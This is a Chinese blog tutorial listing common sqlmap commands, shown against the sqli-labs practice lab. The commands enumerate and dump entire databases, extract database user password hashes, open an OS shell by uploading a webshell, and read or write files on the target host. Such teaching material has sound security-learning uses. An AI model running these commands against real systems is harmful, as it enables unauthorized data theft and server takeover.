sqlmap常用命令

最新推荐文章于 2024-02-26 00:42:22 发布
最新推荐文章于 2024-02-26 00:42:22 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: 渗透工具使用 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/121952203
版权

SQLmap常用命令

此文章以sqli-labs第一关做选项测试
在这里插入图片描述
所有需要填的参数,最好加上双引号,这属于是后知后觉了

指定目标

  • 指定一个url
    sqlmap -u http://192.168.43.16/sqli-labs/Less-1/?id=1

  • 指定一个含有url的文件
    该选项可以测试多个url
    sqlmap -m e:/url.txt
    在这里插入图片描述

  • 指定一个含有http请求头的文件
    sqlmap -r e:/http.txt
    抓你想测试页面的包
    在这里插入图片描述
    保存在一个文件里
    在这里插入图片描述

测试条件

有的网页要登录之后才能测试,这时你可能要用到上面请求标题的选项了
例如
–cookie=COOKIE HTTP Cookie header value (e.g. “PHPSESSID=a8d127e…”)
如果是post请求还需要用到
–method=METHOD Force usage of given HTTP method (e.g. PUT)
–data=DATA Data string to be sent through POST (e.g. “id=1”)
当然了你如果想简单点,可以用burpsuite进行抓包,然后把请求包放在一个文件里,接着使用-r选项就行
sqlmap -r e:/http.txt

查询内容

  • 自动选择默认选项
    --batch (一般测试数据比较多的时候用)

  • 查看注入的详细信息
    -v Verbosity level: 0-6 (default 1)
    0:只输出 Python 出错回溯信息,错误和关键信息。
    1:增加输出普通信息和警告信息。
    2:增加输出调试信息。
    3:增加输出已注入的 payloads。
    4:增加输出 HTTP 请求。
    5:增加输出 HTTP 响应头
    6:增加输出 HTTP 响应内容。
    通常使用-v 3就够用了

  • 查看数据库版本
    sqlmap -u http://192.168.43.16/sqli-labs/Less-1/?id=1 --banner
    在这里插入图片描述

  • 查看当前用户
    sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-user
    在这里插入图片描述

  • 查看当前数据库
    sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db
    在这里插入图片描述

  • 查看全部数据库
    sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs
    在这里插入图片描述

  • 查看某个库的所有表
    sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xvwa --tables
    在这里插入图片描述

  • 查看某个表的所有记录
    sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xvwa -T users --dump
    在这里插入图片描述

脱裤

sqlmap -u http://localhost/sqli-labs/Less-1/?id=1 --exclude-sysdbs --dump-all --batch
–exclude-sysdbs 排除所有的系统数据库
–dump-all 导出所有数据库表条目
–batch 以默认参数运行

执行CMD命令

  • 获得一个交互型的shell
    sqlmap -u http://localhost/sqli-labs/Less-1/?id=1 --os-shell
    根据探测出来的信息进行选择
    在这里插入图片描述
    自定义选择有权限写入的目录,一般其他选项都爆破不出来正确的路径(这里有权限写入标重点,等下会说明)
    在这里插入图片描述
    这里直接复制web服务器根目录的绝对路径就好
    在这里插入图片描述
    成功拿到shell
    在这里插入图片描述
    如果这里拿shell失败
    修改my.ini 在**[mysqld]**内加入secure_file_priv =
    在这里插入图片描述
    在这里插入图片描述
    secure_file_priv的含义可以参考这篇文章
    https://blog.csdn.net/weixin_34082695/article/details/93120118

--os-shell要上传一个木马到目标主机里才能拿shell,所以目标主机必须允许写入\读取功能

拿到交互型sql的shell

–sql-shell
在这里插入图片描述
在这里插入图片描述
如果数据检索出问题,可以加 --no-cast 选项
在这里插入图片描述

文件系统操作

  • 读取目标主机某个文件
    sqlmap -u http://localhost/sqli-labs/Less-1/?id=1 --file-read=e:/url.txt
    保存到特定位置
    在这里插入图片描述
    确实读取到了
    在这里插入图片描述
  • 将本地文件写入目标主机
    sqlmap -u http://localhost/sqli-labs/Less-1/?id=1 --file-write=e:/url.txt --file-dest e:/haha.txt
    这里是将本地的url.txt文件内容,写入到了目标主机e盘下的haha.txt文件里
    在这里插入图片描述

查看敏感信息

  • 查看所用数据库用户
    --users

  • 查看数据库用户密码
    --passwords
    在这里插入图片描述

  • 查看数据库用户权限
    --privileges
    在这里插入图片描述

sqlmap命令改别名

在任意目录下新建bat文件
在这里插入图片描述
添加红框的两行内容,当然sqlmap的路径你要改为你自己sqlmap.py的绝对路径
在这里插入图片描述
接着打开注册表
在这里插入图片描述
一步步打开下面的路径,在右边新建一个autorun的文件,类型为字符串
在这里插入图片描述
数值数据填你刚刚新建bat的路径
在这里插入图片描述
新建完之后,打开cmd
在这里插入图片描述
直接输入sqlmap就能使用了
在这里插入图片描述

SQLmap中文文档

https://sqlmap.campfire.ga/usage
有了这个还会不懂怎么用么??

活着Viva
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
sqlmap命令详解
Pitbull2014的博客
12-20 1061
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
Sqlmap常用命令总结
最新发布
jemus17的博客
02-26 1581
sql注入,sqlmap常用命令总结
Sqlmap命令大全
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 6716
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
SQLMAP 命令详解
安全苦行僧
05-30 389
SQLMAP 命令详解 Options(选项):–version 显示程序的版本号并退出-h, –help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为 1)Target(目标):以下至少需要设置其中一个选项,设置目标 URL。-d DIRECT 直接连接到数据库。-u URL, –url=URL 目标 URL。-l LIST...
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
BT5常用命令
08-08
详细的平时BT5渗透所用的一些常用命令,比如sqlmap,nmap,metasploit等使用
SqlMap AND python 安装.zip
07-04
SqlMap是一款基于Python语言的SQL注入攻击扫描工具,此资源包含Python2.7 与 SqlMap ,关于SqlMap 的使用以及相关常用命令请关注我下一篇资源
sqlmap中文使用手册
06-16
sqlmap的中文使用手册,非常实用,对常用的sqlmap命令参数、作用进行了一一介绍。
免费开源的SQL注入工具SQLmap.zip
07-18
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。   读者可以通过位于SourceForge的官方网站下载SQLmap源码...
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
sqlmap命令
qq_51085206的博客
01-29 629
1、判断网站是否存在注入 get:sqlmap -u “url” post:sqlmap -r “请求数据包” 2、爆数据库 当前数据库 --current-db 线程 --thread (1-10) 爆所有库 --dbs 指定库 -D 爆所有表 --tables 指定表 -T 爆所有列 --columns 指定列 -C 显示内容 --dump 脱库 --dump-all 挂马 --os-shell ...
sqlmap指令
Demerol的博客
11-24 276
常用最基础指令: -u 指定注入点 –dbs 跑库名 –tables 跑表名 –columns 跑字段名 –dump 枚举数据 (手铐警告) -D 指定库 -T 指定表 -C 指定字段 sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C password --dump 常见指令: –random-agent 选择随机user-agents头 –delay=1 每次探测延时1秒(防止访问过快被ban) –count 查看数
SQL注入攻击
Jing-2014
09-02 307
SQL注入攻击:[url]http://baike.baidu.com/view/983303.htm?fr=aladdin[/url] SQL注入攻击是黑客对数据库进行攻击的常用手段之一。 注入简介: SQL注入(SQL Injection)是从正常的WWW端口访问,通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,而...
sqlmap教程一:命令
软件测试技术的博客
07-26 3415
一、sqlmap命令介绍 sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage 摘取了其中的命令参数格式如下 中英对照版: [html] view plain copy Usage: python sqlmap.py [options]    Options(选项):
sqlmap使用命令
arissa666的博客
07-24 98
-dbs 自动的探测web应用后端数据库类型:MySQL、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2(注意:如果不是root用户不能看到所有库)本地D:/3.txt写入到宿主机的目录和文件名C:/phpStudy/3.txt,v1是显示细节。--current-user:大多数数据库中可检测到数据库管理系统当前用户。--is-dba:判断当前的用户是否为管理。
SqlMap常用命令
天乐的博客
01-29 3247
环境:python 工具下载地址:sqlmap.org SqlMap是我们常用的一款sql注入漏洞检测工具,为了方便大家平时的使用,在此分享一下我总结的一下命令。 目录结构: extra:额外功能 lib:连接库,注入参数,提权操作 tamper:绕过脚本 thirdparty:第三方插件 txt:字典,例如浏览器代理,表,列,关键字 udf:自定义攻击载荷 waf:常见防火墙特征–identify-waf 常用命令: 1.注入检测方式: get方式:sqlmap.py -u "URL" post方式:s.
Sqlmap命令讲解
永不垂头的博客
08-05 264
Sqlmap命令讲解 一、Sqlmap命令讲解 apostrophenullencode.py 暴力破解表名如下: 二、Web练习1 1、 Access+ASP注入练习环境(CMS ,NewsInfo.asp,admin/123456,后台数据库备份拿shell) 后续操作请持续关注哦!!! ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值